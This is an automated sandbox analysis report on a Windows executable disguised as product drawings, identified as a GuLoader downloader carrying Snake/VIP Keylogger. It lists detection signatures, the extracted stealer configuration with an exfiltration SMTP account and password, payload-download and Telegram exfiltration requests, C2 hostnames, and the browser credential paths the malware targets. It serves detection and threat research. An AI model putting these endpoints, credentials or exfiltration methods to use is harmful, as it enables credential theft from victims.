Windows Analysis Report
Drawing_Products_Materials_and_Samples_IMG.exe

Overview

General Information

Sample name: Drawing_Products_Materials_and_Samples_IMG.exe
Analysis ID: 1516835
MD5: 9ca0138738dcc4faa58c59c0898d4834
SHA1: d904efbf202092b4b29862951c2b39d1c298ac1b
SHA256: 87da16b9e0f9fc7d74735c59b920dea8460d91f497380aa1a83834b86771b9e2

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Opens the same file many times (likely Sandbox evasion)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64native
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "logs@astonherald.com", "Password": "office12#", "Host": "smtp.zoho.eu", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Email ID": "logs@astonherald.com", "Password": "office12#", "Host": "smtp.zoho.eu", "Port": "587"}
| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
| 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | |
| 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security | |
| 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | |
| 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Detects executables with potential process hoocking | ditekSHen | 0x33f92:$s1: UnHook; 0x33f2e:$s2: SetHook; 0x33f67:$s3: CallNextHook; 0x33ef6:$s4: _hook |

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
| 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | |
| 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security | |
| 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack | INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Detects executables with potential process hoocking | ditekSHen | 0x31472:$s1: UnHook; 0x3140e:$s2: SetHook; 0x31447:$s3: CallNextHook; 0x313d6:$s4: _hook |
| 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth | 0x3d5e0:$a2: \Comodo\Dragon\User Data\Default\Login Data; 0x3cc83:$a3: \Google\Chrome\User Data\Default\Login Data; 0x3cee0:$a4: \Orbitum\User Data\Default\Login Data; 0x3d8bf:$a5: \Kometa\User Data\Default\Login Data |

System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\stub\Sophia.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, ProcessId: 3392, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\file
Source: Network Connection | Author: frack113 | Data: DestinationIp: 185.230.214.164, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe, Initiated: true, ProcessId: 3392, Protocol: tcp, SourceIp: 192.168.11.30, SourceIsIpv6: false, SourcePort: 49821
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2024-09-24T16:31:14.013711+0200 | 2803305 | 3 | Unknown Traffic | 192.168.11.30 | 49812 | 172.67.177.134 | 443 | TCP |
| 2024-09-24T16:31:14.742507+0200 | 2803305 | 3 | Unknown Traffic | 192.168.11.30 | 49813 | 172.67.177.134 | 443 | TCP |
| 2024-09-24T16:31:16.515085+0200 | 2803305 | 3 | Unknown Traffic | 192.168.11.30 | 49814 | 172.67.177.134 | 443 | TCP |
| 2024-09-24T16:31:17.255560+0200 | 2803305 | 3 | Unknown Traffic | 192.168.11.30 | 49815 | 172.67.177.134 | 443 | TCP |
| 2024-09-24T16:31:18.066005+0200 | 2803305 | 3 | Unknown Traffic | 192.168.11.30 | 49816 | 172.67.177.134 | 443 | TCP |
| 2024-09-24T16:31:19.413571+0200 | 2803305 | 3 | Unknown Traffic | 192.168.11.30 | 49817 | 172.67.177.134 | 443 | TCP |
| 2024-09-24T16:31:20.165549+0200 | 2803305 | 3 | Unknown Traffic | 192.168.11.30 | 49818 | 172.67.177.134 | 443 | TCP |
| 2024-09-24T16:31:20.928000+0200 | 2803305 | 3 | Unknown Traffic | 192.168.11.30 | 49819 | 172.67.177.134 | 443 | TCP |
| 2024-09-24T16:31:10.828763+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49810 | 158.101.44.242 | 80 | TCP |
| 2024-09-24T16:31:13.562087+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49810 | 158.101.44.242 | 80 | TCP |
| 2024-09-24T16:31:14.296332+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49810 | 158.101.44.242 | 80 | TCP |
| 2024-09-24T16:31:16.061568+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49810 | 158.101.44.242 | 80 | TCP |
| 2024-09-24T16:31:16.795757+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49810 | 158.101.44.242 | 80 | TCP |
| 2024-09-24T16:31:17.592467+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49810 | 158.101.44.242 | 80 | TCP |
| 2024-09-24T16:31:18.951543+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49810 | 158.101.44.242 | 80 | TCP |
| 2024-09-24T16:31:19.717044+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49810 | 158.101.44.242 | 80 | TCP |
| 2024-09-24T16:31:20.466845+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49810 | 158.101.44.242 | 80 | TCP |
| 2024-09-24T16:31:07.421987+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49809 | 64.188.18.75 | 80 | TCP |

AV Detection

Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "logs@astonherald.com", "Password": "office12#", "Host": "smtp.zoho.eu", "Port": "587", "Version": "4.4"}
Source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "logs@astonherald.com", "Password": "office12#", "Host": "smtp.zoho.eu", "Port": "587"}
Source: C:\Users\user\AppData\Roaming\stub\Sophia.exe | ReversingLabs: Detection: 31%
Source: Drawing_Products_Materials_and_Samples_IMG.exe | ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Roaming\stub\Sophia.exe | Joe Sandbox ML: detected
Source: Drawing_Products_Materials_and_Samples_IMG.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Drawing_Products_Materials_and_Samples_IMG.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.30:49811 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.30:49820 version: TLS 1.2
Source: Binary string: mshtml.pdb source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: _.pdb source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22144177112.0000000035965000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17883981680.0000000004770000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe | Code function: 0_2_00405459 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose, 0_2_00405459
Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe | Code function: 0_2_00405E80 FindFirstFileA,FindClose, 0_2_00405E80
Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe | Code function: 0_2_0040264F FindFirstFileA, 0_2_0040264F
Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe | File opened: C:\Users\user\AppData\Roaming

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344afd6e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.36a20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.344b0c8e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Drawing_Products_Materials_and_Samples_IMG.exe.346f0f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: global traffic | TCP traffic: 192.168.11.30:49821 -> 185.230.214.164:587
Source: global traffic | HTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%2024/09/2024%20/%2010:31:19%0D%0ACountry%20Name:%20Czechia%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 185.230.214.164
Source: Joe Sandbox View | IP Address: 158.101.44.242
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | ASN Name: COMPUTERLINEComputerlineSchlierbachSwitzerlandCH
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.30:49809 -> 64.188.18.75:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49810 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49812 -> 172.67.177.134:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49816 -> 172.67.177.134:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49815 -> 172.67.177.134:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49814 -> 172.67.177.134:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49817 -> 172.67.177.134:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49818 -> 172.67.177.134:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49819 -> 172.67.177.134:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49813 -> 172.67.177.134:443
                Source: global trafficTCP traffic: 192.168.11.30:49821 -> 185.230.214.164:587
                Source: global trafficHTTP traffic detected: GET /ReySnONaTTPqhXrIqUlWWanbq212.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 64.188.18.75Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.30:49811 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 64.188.18.75
                Source: global trafficHTTP traffic detected: GET /xml/79.127.132.20 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: smtp.zoho.eu
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 24 Sep 2024 14:31:22 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.00000000046DC000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22138896008.0000000033CA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://64.188.18.75/ReySnONaTTPqhXrIqUlWWanbq212.bin
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.00000000046DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://64.188.18.75/ReySnONaTTPqhXrIqUlWWanbq212.binp
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.0000000004738000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.0000000004738000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A9B000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034AA6000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.0000000004738000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, Sophia.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, Sophia.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.0000000004738000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0B
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.zoho.eu
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.0000000004738000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://status.thawte.com0:
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.0000000036960000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22149615025.000000003697C000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22124915981.0000000004738000.00000004.00000020.00020000.00000000.sdmp, Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000002.22140550905.0000000034A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.0000000000626000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
                Source: Drawing_Products_Materials_and_Samples_IMG.exe, 00000002.00000001.17726016358.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
